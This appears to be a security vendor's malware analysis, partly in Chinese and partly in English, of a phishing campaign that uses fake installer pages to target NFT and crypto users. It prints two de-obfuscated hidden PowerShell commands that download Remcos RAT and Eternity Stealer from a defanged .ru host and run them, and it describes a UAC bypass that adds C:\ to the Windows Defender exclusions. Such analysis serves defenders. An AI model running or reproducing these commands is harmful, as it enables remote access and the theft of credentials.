2022年9月23日

惡意軟件的傳輸方式沒有太大變化。它向用戶發送一條私人消息，引誘他們下載一個相關的應用程序，據稱該應用程序授予用戶使用最新功能的權限。下麵是針對“Dune”(基於以太坊的加密數據分析平台)用戶的釣魚消息示例。如果用戶點擊消息中的超鏈接，它會將他引導到一個模仿原始網站的誘餌網站。在那裏，用戶會被提示下載惡意的“安裝程序”，它會用Remcos RAT感染受害者的機器。有關基礎設施的更多信息，請閱讀Morphisec之前提到的白皮書“Crypto Scammer之旅”。威脅行為者保持第一階段“安裝程序”的低檢出率。執行從執行用戶帳戶控製(UAC)繞過開始。它劫持了ms-settings協議的默認處理程序，並設置它執行一個Powershell命令，將C:\文件夾添加到Windows Defender排除列表中。執行這種UAC繞過技術的代碼在開源存儲庫中有很好的文檔記錄。 But the attacker employed it extremely poorly—he didn't even bother to remove unnecessary WinAPI calls, such as printing to the console. After excluding the C:\ folder from Windows Defender, the following Powershell commands are de-obfuscated and executed: 1) The first Powershell command downloads and executes a plain Remcos RAT (C2 - 144.91.79[.]86). powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://rwwmefkauiaa[. ]ru/bs8bo90akv.exe -OutFile \"$env:appdata/Microsoft/dllservice.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/dllservice.exe\" The C2 used in that Remcos RAT was also seen in the wild in samples using the Babadeda crypter. This bolsters our suspicion it's the same threat actor. 2) The second Powershell command downloads and executes Eternity Stealer which steals sensitive information from a victim’s machine such as: Browser information like login credentials, history, cookies VPN and FTP client data Messaging software data Password management software data powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; mkdir \"$env:appdata/Microsoft/AddIns\"; Invoke-WebRequest http://rwwmefkauiaa[. ]ru/u84ls.exe -OutFile \"$env:appdata/Microsoft/AddIns/exclusions.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/AddIns/exclusions.exe\" We also noticed a variant of this downloader in the Tandem Espionage campaign shares commonalities with this campaign: There is a similar UAC bypass technique using fodhelper.exe (less evasive implementation) Downloading and executing two malicious executables (Arkei stealer and Eternity stealer) The Eternity stealer is downloaded by the exact same Powershell command as the second Powershell command from the same URL Though the URL downloading the Eternity stealer is the same, we think these may be two different threat actors that used the same downloader as a service. Defending Against NFT Malware Like NFT-001 The crypto and NFT communities are on the cutting edge of financial innovation, and they are a lucrative target for attackers. This naturally means there’s more scope for threat actors to exploit gaps in such rapidly evolving technology. This new staged downloader for NFT-001 is more evasive than the earlier version, increasing its ability to sneak past traditional cybersecurity solutions. According to the latest Picus report, defense evasion is now the most popular tactic among malware operators. This tactic is popular because there aren’t many effective tools against defense evasion. One such tool is Morphisec’s revolutionary Moving Target Defense (MTD) technology, which comprehensively prevents defense evasion techniques. Unlike other cybersecurity solutions which focus on detecting known patterns with response playbooks, MTD preemptively blocks attacks on memory and applications and remediates the need for a response. To learn more about Morphisec’s revolutionary Moving Target Defense technology, read the white paper: Zero Trust + Moving Target Defense: The Ultimate Ransomware Strategy . IOCs